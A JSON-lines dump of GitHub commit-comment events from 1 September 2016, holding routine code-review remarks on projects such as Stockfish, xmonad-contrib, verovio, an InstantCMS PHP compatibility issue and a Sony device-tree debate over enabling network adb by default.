{"id":"4504139723","type":"CommitCommentEvent","actor":{"login":"cssjoe"},"repo":{"name":"BoldGrid/boldgrid-inspirations"},"payload":{"comment":{"id":18867931,"position":8,"line":253,"path":"includes/class-boldgrid-inspirations-feedback.php","commit_id":"ff19e833e565862861bc78bc97d7df11bd87ebea","created_at":"2016-09-01T17:59:36Z","updated_at":"2016-09-01T17:59:36Z","body":"value may be an array, string, or int."}},"created_at":"2016-09-01T17:59:36Z"}
{"id":"4504146645","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18867951,"position":null,"line":null,"path":null,"commit_id":"5f43e7b964d48d57ec7fabdbf36a832aee53dca4","created_at":"2016-09-01T18:00:50Z","updated_at":"2016-09-01T18:00:50Z","body":"It only casts if there is a victim within 10 yards. Check the target type."}},"created_at":"2016-09-01T18:00:50Z"}
{"id":"4504148186","type":"CommitCommentEvent","actor":{"login":"conal"},"repo":{"name":"conal/quotes"},"payload":{"comment":{"id":18867962,"position":13,"line":13,"path":"quotes.md","commit_id":"0ea93ef5def68f98097d6fc014d0eb9e6e866ed4","created_at":"2016-09-01T18:01:09Z","updated_at":"2016-09-01T18:01:09Z","body":"Hah. Thanks. Fixed."}},"created_at":"2016-09-01T18:01:09Z"}
{"id":"4504150357","type":"CommitCommentEvent","actor":{"login":"mazharoddin"},"repo":{"name":"mazharoddin/camaleon-cms"},"payload":{"comment":{"id":18867966,"position":null,"line":null,"path":null,"commit_id":"fdca7e70e89215b4ee33b34a6175eeaac6f8ffb7","created_at":"2016-09-01T18:01:29Z","updated_at":"2016-09-01T18:01:29Z","body":"May be my understanding is wrong, but what I always do is, I delete Gemfile.lock and remove version info in Gemfile, with this change I can use existing gems (if required gem is already is available), if its not available then it will install latest gem from rubygems server. \r\nIf I don't delete Gemfile.lock and remove version info in Gemfile then it will install the gems which are locked by Gemfile.lock, which created  dependency issues with most of the rails apps. Thanks.   "}},"created_at":"2016-09-01T18:01:29Z"}
{"id":"4504151710","type":"CommitCommentEvent","actor":{"login":"my-instantcms"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":18867973,"position":null,"line":null,"path":null,"commit_id":"74bae5305c1c4554f1a469515fac956cd11a1ee3","created_at":"2016-09-01T18:01:41Z","updated_at":"2016-09-01T18:01:41Z","body":"Здравствуйте.\r\nУ меня PHP 5.3 и там grid таблицы в адмнке не работают, получаю ошибку \r\nFatal error:  Call to undefined function array_column() in ...\\system\\core\\template.php on line 1214\r\nХотя на open server с php 5.5 работает"}},"created_at":"2016-09-01T18:01:41Z"}
{"id":"4504157413","type":"CommitCommentEvent","actor":{"login":"czlee"},"repo":{"name":"czlee/tabbycat"},"payload":{"comment":{"id":18867986,"position":4,"line":243,"path":"tabbycat/results/forms.py","commit_id":"5fb984b8719ccf911c13ec839bc9ed77e8ee93a1","created_at":"2016-09-01T18:02:47Z","updated_at":"2016-09-01T18:02:47Z","body":"As for prefilled validation, it doesn't highlight red or anything so I think it's fine, I'll also remove line 14 of enter_result.js."}},"created_at":"2016-09-01T18:02:47Z"}
{"id":"4504160920","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18867994,"position":null,"line":null,"path":null,"commit_id":"911b45d1dc53947a25edf764e45cd92d8ef45bd3","created_at":"2016-09-01T18:03:26Z","updated_at":"2016-09-01T18:03:26Z","body":"OK, it did not came out clearly. Here it is for reference\r\nHe added the full board values (8 pawns, 2N, 2N, 2R and 1Q) and adjusted the limits using the same proportion.\r\n\r\n`New root material = 188 * 8 + 753 * 2 + 826 * 2 + 1285 * 2 + 2513 *1 = 9745\r\n Old root material = 198 * 8 + 817 * 2 + 836 * 2 + 1270 * 2 + 252 * 1 = 9951`\r\n\r\nWe might use a similar idea to find to move the game play averages of PSQT and MobilityBonus,\r\nand move these averages to PieceValue[]...\r\n\r\nWell done Stefano !\r\n\r\n"}},"created_at":"2016-09-01T18:03:26Z"}
{"id":"4504163282","type":"CommitCommentEvent","actor":{"login":"fuzegit"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":18868005,"position":null,"line":null,"path":null,"commit_id":"74bae5305c1c4554f1a469515fac956cd11a1ee3","created_at":"2016-09-01T18:03:49Z","updated_at":"2016-09-01T18:03:49Z","body":"Да, пардон, поспешил, с 5.5.0 версии эта функция появилась. Поправлю."}},"created_at":"2016-09-01T18:03:49Z"}
{"id":"4504163748","type":"CommitCommentEvent","actor":{"login":"aaronsky"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18868003,"position":null,"line":null,"path":null,"commit_id":"a02c2384645cffee5f8bcc2bd71c38c37b0f2e02","created_at":"2016-09-01T18:03:47Z","updated_at":"2016-09-01T18:03:47Z","body":"The example shows passing the seconds since the epoch, but in RCTConvert#NSTimeInterval a timestamp using milliseconds is expected."}},"created_at":"2016-09-01T18:03:47Z"}
{"id":"4504165526","type":"CommitCommentEvent","actor":{"login":"scoder"},"repo":{"name":"haypo/perf"},"payload":{"comment":{"id":18868011,"position":44,"line":97,"path":"perf/text_runner.py","commit_id":"b2b0067fe45f3c5037d8fcd95d23c9d2afa38b31","created_at":"2016-09-01T18:04:14Z","updated_at":"2016-09-01T18:04:14Z","body":"It's not necessarily true that `sys.srgv[0]` is different from `sys.executable`. Cython would generate an executable that embeds libpython for each of the benchmarks, in which case both values point to the same main executable. Would it be ok to check if both are equal, and only append `sys.argv[0]` if they are not?\r\n\r\nNote also that the comment above seems outdated."}},"created_at":"2016-09-01T18:04:14Z"}
{"id":"4504166672","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18868013,"position":null,"line":null,"path":null,"commit_id":"51f7f695d384f8537b338f134376648849823833","created_at":"2016-09-01T18:04:26Z","updated_at":"2016-09-01T18:04:26Z","body":"As in, th return vod on the phpdoc. Our docs ob laravel.com don't mention anything being returned."}},"created_at":"2016-09-01T18:04:26Z"}
{"id":"4504167280","type":"CommitCommentEvent","actor":{"login":"mjansenDatabay"},"repo":{"name":"ILIAS-eLearning/ILIAS"},"payload":{"comment":{"id":18868019,"position":43,"line":381,"path":"setup/classes/class.ilDbSetup.php","commit_id":"104f2b55006ed9c9f5080554a7976d070354f0eb","created_at":"2016-09-01T18:04:33Z","updated_at":"2016-09-01T18:04:33Z","body":"@chfsx This will crash with PHP < 7.0.x"}},"created_at":"2016-09-01T18:04:33Z"}
{"id":"4504167822","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18868023,"position":null,"line":null,"path":null,"commit_id":"788a32b0aa655831e334f3d3b5cbe08e6f3f7cbe","created_at":"2016-09-01T18:04:39Z","updated_at":"2016-09-01T18:04:39Z","body":"Hi @mcostalba : It failed! Yes, so we avoid discussions... I only have a real problem with pick_best. We do there two things which are generally considered harmful:\r\n\r\nstatic PRNG rng(now()); // PRNG sequence should be non-deterministic: now() is a time_point and not a uint64_t as required by the PRNG constructor. Maybe this is not an issue, but one never knows...\r\n\r\n(rng.rand<unsigned>() % weakness)) : this gives a non uniformly distributed number. I know, I know the error is very small, but for the educational purposes of SF it is really bad to have this beginner's mistake there.\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-01T18:04:39Z"}
{"id":"4504168729","type":"CommitCommentEvent","actor":{"login":"AndrewS-Vbosch"},"repo":{"name":"AndrewS-Vbosch/gitwatch"},"payload":{"comment":{"id":18868030,"position":null,"line":null,"path":null,"commit_id":"a4c4b5050e79994a42e9acf6d4853cd977f1e8b8","created_at":"2016-09-01T18:04:50Z","updated_at":"2016-09-01T18:04:50Z","body":"How did I manage to make two identical commits?\r\n\r\n¯\\_(ツ)_/¯"}},"created_at":"2016-09-01T18:04:50Z"}
{"id":"4504170298","type":"CommitCommentEvent","actor":{"login":"Akira1San"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":18868033,"position":null,"line":null,"path":null,"commit_id":"2846e2eadfbb6f59a163a6c2ed49df904a1fd724","created_at":"2016-09-01T18:05:10Z","updated_at":"2016-09-01T18:05:10Z","body":"I see, thx."}},"created_at":"2016-09-01T18:05:10Z"}
{"id":"4504172021","type":"CommitCommentEvent","actor":{"login":"nouiz"},"repo":{"name":"Theano/Theano"},"payload":{"comment":{"id":18868044,"position":5,"line":1027,"path":"theano/compile/debugmode.py","commit_id":"524412bcbfd25a7d3bd6f3ae1f30b71f60b6e260","created_at":"2016-09-01T18:05:29Z","updated_at":"2016-09-01T18:05:29Z","body":"I think we can move this import at the top."}},"created_at":"2016-09-01T18:05:29Z"}
{"id":"4504181360","type":"CommitCommentEvent","actor":{"login":"fuzegit"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":18868066,"position":null,"line":null,"path":null,"commit_id":"74bae5305c1c4554f1a469515fac956cd11a1ee3","created_at":"2016-09-01T18:07:16Z","updated_at":"2016-09-01T18:07:16Z","body":"Добавьте себе в файл /system/libs/strings.helper.php куда-нибудь вниз\r\nhttps://github.com/ramsey/array_column/blob/master/src/array_column.php\r\nбез открывающего тега <?php конечно же"}},"created_at":"2016-09-01T18:07:16Z"}
{"id":"4504185588","type":"CommitCommentEvent","actor":{"login":"Quarx2k"},"repo":{"name":"sonyxperiadev/device-sony-common"},"payload":{"comment":{"id":18868078,"position":null,"line":null,"path":null,"commit_id":"06139bd50e346c553287a454ec90bb2bf0500c00","created_at":"2016-09-01T18:08:06Z","updated_at":"2016-09-01T18:08:06Z","body":"Hm, why we enable network adb by default?"}},"created_at":"2016-09-01T18:08:06Z"}
{"id":"4504191211","type":"CommitCommentEvent","actor":{"login":"xylographe"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":18868103,"position":null,"line":null,"path":null,"commit_id":"3bb500f69d57d1eab3399389b56232d83d7d665b","created_at":"2016-09-01T18:09:09Z","updated_at":"2016-09-01T18:09:09Z","body":"ILRepack-2.0.11 seems OK, but, I think, it might be a little too soon to push to master."}},"created_at":"2016-09-01T18:09:09Z"}
{"id":"4504193277","type":"CommitCommentEvent","actor":{"login":"alviteri"},"repo":{"name":"sonyxperiadev/device-sony-common"},"payload":{"comment":{"id":18868110,"position":null,"line":null,"path":null,"commit_id":"06139bd50e346c553287a454ec90bb2bf0500c00","created_at":"2016-09-01T18:09:32Z","updated_at":"2016-09-01T18:09:32Z","body":"this is useful for development .... if you are asking due to in CM is enabled all the time is because AOSP has not switch ON/OFF for it"}},"created_at":"2016-09-01T18:09:32Z"}
{"id":"4504193843","type":"CommitCommentEvent","actor":{"login":"vjdipippo"},"repo":{"name":"galetahub/ckeditor"},"payload":{"comment":{"id":18868111,"position":null,"line":null,"path":null,"commit_id":"8b5d21d1a8727e2b9e1dba505f04b485ba840d37","created_at":"2016-09-01T18:09:38Z","updated_at":"2016-09-01T18:09:38Z","body":"This change breaks the view.  @attachments is not an AR model or enumerable class and as such causes an empty file list to be rendered.  It is a paginator, which is why the .scoped method worked, as it returns an AR model.  Please correct.  ../pictures/index.html.erb is still correct and functioning."}},"created_at":"2016-09-01T18:09:38Z"}
{"id":"4504194420","type":"CommitCommentEvent","actor":{"login":"clburlison"},"repo":{"name":"aoswhitepapers/Santa"},"payload":{"comment":{"id":18868117,"position":null,"line":null,"path":null,"commit_id":"3e10634986d6fc7daacfb7f4a12454308e043c5b","created_at":"2016-09-01T18:09:43Z","updated_at":"2016-09-01T18:09:43Z","body":"I think your Generic pdf has a phone number that should be removed."}},"created_at":"2016-09-01T18:09:43Z"}
{"id":"4504196457","type":"CommitCommentEvent","actor":{"login":"mdf3039"},"repo":{"name":"mdf3039/Predicting-Boston-Housing-Prices-for-Udacity-MLE-Nanodegree"},"payload":{"comment":{"id":18868120,"position":null,"line":null,"path":null,"commit_id":"dcfaa594f8b7b3ab6ba67fb21fcbd71f1ca32759","created_at":"2016-09-01T18:10:08Z","updated_at":"2016-09-01T18:10:08Z","body":"This commit adds the necessary data file to run the Python code boston_housing_code.py. A typical CSV file, which can also be opened and observed through Microsoft Excel."}},"created_at":"2016-09-01T18:10:08Z"}
{"id":"4504201539","type":"CommitCommentEvent","actor":{"login":"triple111"},"repo":{"name":"triple111/MUDscape"},"payload":{"comment":{"id":18868134,"position":null,"line":null,"path":null,"commit_id":"2982fe396c46912fae4af906d39301f6f5e9d938","created_at":"2016-09-01T18:11:04Z","updated_at":"2016-09-01T18:11:04Z","body":"I changed the command style method from the following. This has broken several \"map\" and the move commands.\r\n\r\nhttps://gist.github.com/teaearlgraycold/b76239e1ac97cb7e681913a2ef0488ae"}},"created_at":"2016-09-01T18:11:04Z"}
{"id":"4504202936","type":"CommitCommentEvent","actor":{"login":"geekosaur"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18868138,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T18:11:20Z","updated_at":"2016-09-01T18:11:20Z","body":"@f1u77y  your reasoning is incorrect. You need to cache the struts globally, possibly with an indication of which edge the struts is on to speed up the LRUD stuff, but *apply* the information per layout. Otherwise you're going to need to make sure every `avoidStruts` including the ones not active on the current workspace has an up to date cache (this is doable but annoying), or the inactive ones will fail to apply struts once they become active.\r\n\r\n`avoidStruts` should cache whether struts are enabled or disabled. The struts themselves (window XID, position and size) should be global. Don't cache which struts are being obeyed; all the information needed for that should be in the cache (instead of having to query the X server), and activation/deactivation of struts along an edge changes the list significantly in ways that the `ManageHook` should not have to know or care about. It's also pointless duplication, and a hassle if the active lists get out of sync.\r\n\r\nBTW, re the earlier comment, I have used `avoidStrutsOn` for a while now. Probably its most common use is to have struts supported on a workspace but defaulted to disabled (`avoidStrutsOn []`)."}},"created_at":"2016-09-01T18:11:20Z"}
{"id":"4504203366","type":"CommitCommentEvent","actor":{"login":"npomfret"},"repo":{"name":"jemise111/react-native-swipe-list-view"},"payload":{"comment":{"id":18868140,"position":51,"line":406,"path":"README.md","commit_id":"1c692b549d9f39d4d408607e77e319f6a5652644","created_at":"2016-09-01T18:11:25Z","updated_at":"2016-09-01T18:11:25Z","body":"How do you get it to slide the in the other direction?  Currently I can only get the view to slide left (exposing the right), but I need it the other way around.  I tried setting a -ve value but that didn't work."}},"created_at":"2016-09-01T18:11:25Z"}
{"id":"4504203941","type":"CommitCommentEvent","actor":{"login":"midwan"},"repo":{"name":"Chips-fr/uae4arm-rpi"},"payload":{"comment":{"id":18868145,"position":7,"line":7,"path":"Makefile","commit_id":"956080b6cba7ab05670dc584067ced8c45bf05f4","created_at":"2016-09-01T18:11:32Z","updated_at":"2016-09-01T18:11:32Z","body":"Thanks, I'll remove it. This was added to sync it with TomB's makefile options, as a starting point for further investigation."}},"created_at":"2016-09-01T18:11:32Z"}
{"id":"4504204221","type":"CommitCommentEvent","actor":{"login":"f1u77y"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18868147,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T18:11:35Z","updated_at":"2016-09-01T18:11:35Z","body":"@liskin \r\n> So at least this should be a global thing.\r\n\r\nOkay, you're right there."}},"created_at":"2016-09-01T18:11:35Z"}
{"id":"4504206275","type":"CommitCommentEvent","actor":{"login":"Quarx2k"},"repo":{"name":"sonyxperiadev/device-sony-common"},"payload":{"comment":{"id":18868155,"position":null,"line":null,"path":null,"commit_id":"06139bd50e346c553287a454ec90bb2bf0500c00","created_at":"2016-09-01T18:12:00Z","updated_at":"2016-09-01T18:12:00Z","body":"I know, but anyway, if device went to bootloop, netwrok adb cant help..."}},"created_at":"2016-09-01T18:12:00Z"}
{"id":"4504209082","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":18868162,"position":null,"line":null,"path":null,"commit_id":"aefb21790da4cf94a970946738a82061df8857da","created_at":"2016-09-01T18:12:34Z","updated_at":"2016-09-01T18:12:34Z","body":"This commit is a partial implementation of issue #233, implementing `scoreDef@midi.bpm` import and export for MEI data.     The libmei library did not have completed code for MIDI, so I added additional code to `libmei/atts_midi.cpp` to make the compiler happy.  Some of the functionality looks like it should be added as class members, but I added as regular functions (they could be added as static functions to a class, but I did not look closely to see which class(es) the functions should be attached to).  Some code might need moving to the verovio defs code.  I also added conversion of Humdrum file tempos into MEI (which was the point of the partial implementation).\r\n\r\nI didn't implement tempos in the MIDI export code, mostly because there will need to be generalization of the WildWebMIDI playback with note highlighting, which is currently hard-coded to 120 bpm.  There was a strange removal of `scoredef@midi.bpm` that is probably related to this hard-coding, and which I removed :-)  I also did not implement `tempo@midi.bpm`, although it will probably be simple to add. \r\n\r\n"}},"created_at":"2016-09-01T18:12:34Z"}
{"id":"4504212120","type":"CommitCommentEvent","actor":{"login":"znichols"},"repo":{"name":"spotify/scio"},"payload":{"comment":{"id":18868173,"position":4,"line":29,"path":"scio-core/src/main/scala/com/spotify/scio/values/PairSCollectionFunctions.scala","commit_id":"fca7ef79dffd246d6d78710d1d318a5b7419027f","created_at":"2016-09-01T18:13:09Z","updated_at":"2016-09-01T18:13:09Z","body":"Maybe check out breeze.stats ?"}},"created_at":"2016-09-01T18:13:09Z"}
{"id":"4504212251","type":"CommitCommentEvent","actor":{"login":"dmsuehir"},"repo":{"name":"ekote/spark-timeseries"},"payload":{"comment":{"id":18868174,"position":5,"line":74,"path":"scalastyle-config.xml","commit_id":"7ef352d85355a49a372a4499b9fb1570139feb2e","created_at":"2016-09-01T18:13:10Z","updated_at":"2016-09-01T18:13:10Z","body":"If you remove userInitParams from fitModel(), then can you revert this change?  Looks like it will have 8 parameters."}},"created_at":"2016-09-01T18:13:10Z"}
{"id":"4504216137","type":"CommitCommentEvent","actor":{"login":"alviteri"},"repo":{"name":"sonyxperiadev/device-sony-common"},"payload":{"comment":{"id":18868185,"position":null,"line":null,"path":null,"commit_id":"06139bd50e346c553287a454ec90bb2bf0500c00","created_at":"2016-09-01T18:13:54Z","updated_at":"2016-09-01T18:13:54Z","body":"there is still adb usb ....."}},"created_at":"2016-09-01T18:13:54Z"}
{"id":"4504218609","type":"CommitCommentEvent","actor":{"login":"marych"},"repo":{"name":"OfficeDev/microsoft-graph-docs"},"payload":{"comment":{"id":18868193,"position":null,"line":null,"path":null,"commit_id":"a724fb2a42a67a215590ab5470cb299bb7dd89ac","created_at":"2016-09-01T18:14:22Z","updated_at":"2016-09-01T18:14:22Z","body":"Yes, documentation should have String type for the visibility property."}},"created_at":"2016-09-01T18:14:22Z"}
{"id":"4504220963","type":"CommitCommentEvent","actor":{"login":"ericbn"},"repo":{"name":"tldr-pages/tldr"},"payload":{"comment":{"id":18868205,"position":22,"line":23,"path":"pages/common/zip.md","commit_id":"be0fbaec973d1582be38c8ced94b899fdc4076eb","created_at":"2016-09-01T18:14:49Z","updated_at":"2016-09-01T18:14:49Z","body":"I'd suggest we only use `t[e]xt` as a last resource, mainly when there is more than one switch being used and when the switch does not take any parameter or cannot have a self-explanatory parameter. Just trying to use a word that matches already helps. I'd first try to make the command itself self-explanatory, like:\r\n\r\n```\r\n- Delete files from an existing zip file:\r\n  \r\n `zip -d {{compressed.zip}} \"{{*.removeme}}\"`\r\n```"}},"created_at":"2016-09-01T18:14:49Z"}
{"id":"4504225032","type":"CommitCommentEvent","actor":{"login":"whitelynx"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":18868219,"position":11,"line":208,"path":"public/app/plugins/datasource/elasticsearch/datasource.js","commit_id":"474a821767e615877436ab8ae7eb694f0059259c","created_at":"2016-09-01T18:15:33Z","updated_at":"2016-09-01T18:15:33Z","body":"Is there a particular reason for using `JSON.stringify()` here, as opposed to `angular.toJson()` as used below? ([line 252](https://github.com/grafana/grafana/commit/474a821767e615877436ab8ae7eb694f0059259c#diff-ecfe215a9820d2930d1157cca99c0acfR252))"}},"created_at":"2016-09-01T18:15:33Z"}
{"id":"4504225660","type":"CommitCommentEvent","actor":{"login":"andrewrk"},"repo":{"name":"andrewrk/zig"},"payload":{"comment":{"id":18868222,"position":null,"line":null,"path":null,"commit_id":"f18e34c2c6b7884a76d98d86b41857044dbe0f06","created_at":"2016-09-01T18:15:40Z","updated_at":"2016-09-01T18:15:40Z","body":"@procedural - this commit should let you try out automatic shared library generation. For example, from the build folder:\r\n\r\n```\r\n./zig build --export lib --name mathtest  ../example/shared_library/mathtest.zig\r\n```\r\n\r\nThis makes the files mathtest.o, libmathtest.so.0.0.0, and mathtest.h.\r\n\r\nI didn't finish all the type renderings though, see lines 5075-5084. These types will cause a TODO panic currently."}},"created_at":"2016-09-01T18:15:40Z"}
{"id":"4504225910","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":18868224,"position":7,"line":60,"path":"movies.rb","commit_id":"aa5f2d55ce3bdd6934bc897b4c8b22dd84ee1fda","created_at":"2016-09-01T18:15:43Z","updated_at":"2016-09-01T18:15:43Z","body":"Ну, их там много, допустим (movies), но эт уж мелочи."}},"created_at":"2016-09-01T18:15:43Z"}
{"id":"4504226940","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18868226,"position":null,"line":null,"path":null,"commit_id":"a5ed520e8567bd5d61882c6bca10d31e973f0931","created_at":"2016-09-01T18:15:55Z","updated_at":"2016-09-01T18:15:55Z","body":"TODO: provide API docs"}},"created_at":"2016-09-01T18:15:55Z"}
{"id":"4504231906","type":"CommitCommentEvent","actor":{"login":"jdstrand"},"repo":{"name":"ssweeny/snap-confine"},"payload":{"comment":{"id":18868234,"position":7,"line":226,"path":"src/mount-support.c","commit_id":"3094715f1e1fd49e216b0f1d3be24408ad912019","created_at":"2016-09-01T18:16:50Z","updated_at":"2016-09-01T18:16:50Z","body":"FYI, setup_snappy_os_mounts() is only run on classic systems."}},"created_at":"2016-09-01T18:16:50Z"}
{"id":"4504233106","type":"CommitCommentEvent","actor":{"login":"midwan"},"repo":{"name":"Chips-fr/uae4arm-rpi"},"payload":{"comment":{"id":18868236,"position":79,"line":85,"path":"Makefile","commit_id":"956080b6cba7ab05670dc584067ced8c45bf05f4","created_at":"2016-09-01T18:17:03Z","updated_at":"2016-09-01T18:17:03Z","body":"You're right, and quite a few more are enabled as well. I'll clean it up, thanks for the suggestion!"}},"created_at":"2016-09-01T18:17:03Z"}
{"id":"4504233282","type":"CommitCommentEvent","actor":{"login":"my-instantcms"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":18868237,"position":null,"line":null,"path":null,"commit_id":"74bae5305c1c4554f1a469515fac956cd11a1ee3","created_at":"2016-09-01T18:17:05Z","updated_at":"2016-09-01T18:17:05Z","body":"Спасибо"}},"created_at":"2016-09-01T18:17:05Z"}
{"id":"4504234388","type":"CommitCommentEvent","actor":{"login":"f1u77y"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18868238,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T18:17:17Z","updated_at":"2016-09-01T18:17:17Z","body":"Okay I've understood that **strut** cache should be global. But anyway **rect** cache should not be global, shouldn't it?"}},"created_at":"2016-09-01T18:17:17Z"}
{"id":"4504234941","type":"CommitCommentEvent","actor":{"login":"Quarx2k"},"repo":{"name":"sonyxperiadev/device-sony-common"},"payload":{"comment":{"id":18868240,"position":null,"line":null,"path":null,"commit_id":"06139bd50e346c553287a454ec90bb2bf0500c00","created_at":"2016-09-01T18:17:23Z","updated_at":"2016-09-01T18:17:23Z","body":"Yep, but always enabled wifi adb looks like network vulnerability even with adb key checking."}},"created_at":"2016-09-01T18:17:23Z"}
{"id":"4504235471","type":"CommitCommentEvent","actor":{"login":"goligo"},"repo":{"name":"SAP/openui5"},"payload":{"comment":{"id":18868241,"position":null,"line":null,"path":null,"commit_id":"348cdf88e51b0401c178d71d0756700ba479d37e","created_at":"2016-09-01T18:17:29Z","updated_at":"2016-09-01T18:17:29Z","body":"@ndown Well, this is how deep sorting works, isn't it? If you sort by last name and first name, and the last name is different, you don't need to check the first name to determine which one comes first. Only if the last name is the same, the first name does matter."}},"created_at":"2016-09-01T18:17:29Z"}
{"id":"4504236710","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":18868245,"position":null,"line":null,"path":null,"commit_id":"aefb21790da4cf94a970946738a82061df8857da","created_at":"2016-09-01T18:17:44Z","updated_at":"2016-09-01T18:17:44Z","body":"Here is sample conversion of tempos from Humdrum to MEI (only initial tempos are converted, and only into `scoreDef`, not `tempo` elements).  The tempo is 72.  Humdrum and MEI both specify tempo only in terms of quarter notes (not beats unless they happen to be quarter notes).\r\n\r\n```\r\n**kern\r\n*clefG2\r\n*M4/4\r\n*MM72\r\n=1-\r\n1c;\r\n==\r\n*-\r\n```\r\n\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/3.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/3.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"3.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt>\r\n                <date>2016-09-01 20:13:09</date>\r\n            </pubStmt>\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <projectDesc>\r\n                <p>Transcoded from Humdrum with Verovio version 0.9.12-dev-4ae77c1-dirty</p>\r\n            </projectDesc>\r\n        </encodingDesc>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv>\r\n                <score>\r\n                    <scoreDef xml:id=\"scoredef-000000080485814\" midi.bpm=\"72\">\r\n                        <staffGrp xml:id=\"m-000000068816460\">\r\n                            <staffDef xml:id=\"staffdef-000000010000756\" clef.shape=\"G\" clef.line=\"2\" meter.count=\"4\" meter.unit=\"4\" n=\"1\" lines=\"5\" />\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section>\r\n                        <measure xml:id=\"measure-000000071677388\" n=\"1\" right=\"end\">\r\n                            <staff xml:id=\"staff-000000040660539\" n=\"1\">\r\n                                <layer xml:id=\"layer-000000168428696\" n=\"1\">\r\n                                    <note xml:id=\"note-L6F1\" dur=\"1\" fermata=\"above\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```\r\n"}},"created_at":"2016-09-01T18:17:44Z"}
{"id":"4504237685","type":"CommitCommentEvent","actor":{"login":"fuzegit"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":18868248,"position":null,"line":null,"path":null,"commit_id":"74bae5305c1c4554f1a469515fac956cd11a1ee3","created_at":"2016-09-01T18:17:57Z","updated_at":"2016-09-01T18:17:57Z","body":"Это навскидку, чтобы сейчас заработало. Позже заменю функцию."}},"created_at":"2016-09-01T18:17:57Z"}
{"id":"4504240227","type":"CommitCommentEvent","actor":{"login":"lucas-mancini"},"repo":{"name":"juanomgpt/iso-10383"},"payload":{"comment":{"id":18868257,"position":null,"line":null,"path":null,"commit_id":"f9211dbf4d0fa0b1568758b74d8f63aba7067d5c","created_at":"2016-09-01T18:18:25Z","updated_at":"2016-09-01T18:18:25Z","body":"Cool, I agree with most of the comments, also, maybe it is worth adding a CHANGELOG.md file to describe what's new when we update the package. "}},"created_at":"2016-09-01T18:18:25Z"}
{"id":"4504240788","type":"CommitCommentEvent","actor":{"login":"ramapcsx2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18868259,"position":null,"line":null,"path":null,"commit_id":"d78d515acb04a3bfbf0f1dca125fbb2756cbbe9d","created_at":"2016-09-01T18:18:30Z","updated_at":"2016-09-01T18:18:30Z","body":"Hey, I tried it briefly (uncommented the table entry, of course) but I still get unknown opcodes and the assert. http://i.imgur.com/9c6zk18.png\r\n"}},"created_at":"2016-09-01T18:18:30Z"}
{"id":"4504242522","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18868263,"position":null,"line":null,"path":null,"commit_id":"b5a113a8f5b41e95ac669674ae3623f23ed3875b","created_at":"2016-09-01T18:18:50Z","updated_at":"2016-09-01T18:18:50Z","body":"Related to: backdrop/backdrop-issues#450 "}},"created_at":"2016-09-01T18:18:50Z"}
{"id":"4504242546","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18868264,"position":null,"line":null,"path":null,"commit_id":"445e26dda8d480ba7b5a083b8cd07a53ce2d11ee","created_at":"2016-09-01T18:18:50Z","updated_at":"2016-09-01T18:18:50Z","body":"Related to: backdrop/backdrop-issues#450 "}},"created_at":"2016-09-01T18:18:50Z"}
